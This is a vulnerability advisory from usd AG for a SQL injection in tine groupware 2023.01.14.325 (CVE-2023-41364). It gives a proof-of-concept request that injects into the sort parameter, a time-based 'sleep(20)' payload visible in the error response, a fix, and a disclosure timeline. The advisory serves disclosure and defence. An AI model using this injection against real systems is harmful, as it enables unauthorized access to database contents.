usd-2023-0002 | tine20 2023.01.14.325 - SQL Injection

Advisory ID: usd-2023-0002
Product: tine groupware
Affected Version: 2023.01.14.325
Vulnerability Type: CWE 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Security Risk: Critical
Vendor URL: https://www.tine-groupware.de/
Vendor Status: Fixed
CVE number: CVE-2023-41364
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-41364
Last Update: 2023-08-28

Description

Tine Groupware is an open source software that provides a suite of collaborative tools and applications for communication and project management within a business or organization.
It offers features such as email, calendars, task management, contact management, and document management, allowing users to coordinate and share information across teams and departments.

During our research on open open source software, we discovered, that the sort parameter of the /index.php endpoint is vulnerable to SQL-Injection.

Proof of Concept

The request below was used to search contacts in the addressbook.

POST /index.php?transactionid=ae67275bb875279ab755f7e8932334f1f67fbb4c HTTP/1.1
Host: localhost:4000
Content-Length: 376
Cookie: TINE20SESSID=isgch37p9s2ql7rl902b9cjabk; usercredentialcache=eyJpZCI6ImNmZWE3Y2Y4OGE5MjcyM2M5N2JkMWNkOTRmYmRjNzA1ZGY5NzJiODEiLCJrZXkiOiI0MGU1MWE5NTE1ZDIwMWExOTE0MmYxNmMifQ%3D%3D
Connection: close
[...]


{"jsonrpc":"2.0","method":"Addressbook.searchContacts","params":{"filter":[{"condition":"OR","filters":[{"condition":"AND","filters":[],"id":"ext-comp-1229","label":"Contacts"}],"id":"FilterPanel"},{"field":"query","operator":"contains","value":null,"id":"quickFilter"}],"paging":{"sort":"n_fileas'","dir":"ASC","start":0,"limit":50}},"id":33}

The response contains the SQL query if injecting more SQLi payloads:

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/json
Content-Length: 3853
[...]


{"error":{"code":-32000,"message":"SQLSTATE[42S22]: Column not found: 1054 Unknown column 'n_fileas, sleep(20)' in 'order clause', query was: SELECT **addressbook**.*, (CASE WHEN **addressbook_image**.**contact_id** IS NULL THEN 0 ELSE 1 END) AS **jpegphoto**, **accounts**.**id** AS **account_id** FROM **tine_addressbook** AS **addressbook**\n LEFT JOIN **tine_addressbook_image** AS **addressbook_image** ON **addressbook**.**id** = **addressbook_image**.**contact_id**\n LEFT JOIN **tine_accounts** AS **accounts** ON **addressbook**.**id** = **accounts**.**contact_id** WHERE (**addressbook**.**is_deleted** = 0) AND (**addressbook**.**id** in ('8862248fdce32e46c05a84b12c9e74407f44a23b', 'b70f5321b4339a037e5427ec2504dafa84006d15')) GROUP BY **addressbook**.**id** ORDER BY **n_fileas, sleep(20)** ASC, **account_id** ASC",

Injecting a sleep(20) into the parameter delays the response.

A successful exploitation of this vulnerability allows an unauthorized person to gain access to sensitive data in the database.

Fix

It is recommended to use prepared statements.

References

• https://owasp.org/www-community/attacks/SQL_Injection

Timeline

• 2023-01-24: First contact request via mail
• 2023-04-21: Ask vendor for status update
• 2023-05-04: Vendor does not see an exploitable vulnerability
• 2023-05-15: Share more payloads and proofs to the vendor
• 2023-05-17: Vendor denies exploitable vulnerability
• 2023-05-23: Vulnerability is fixed, according to the vendor

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.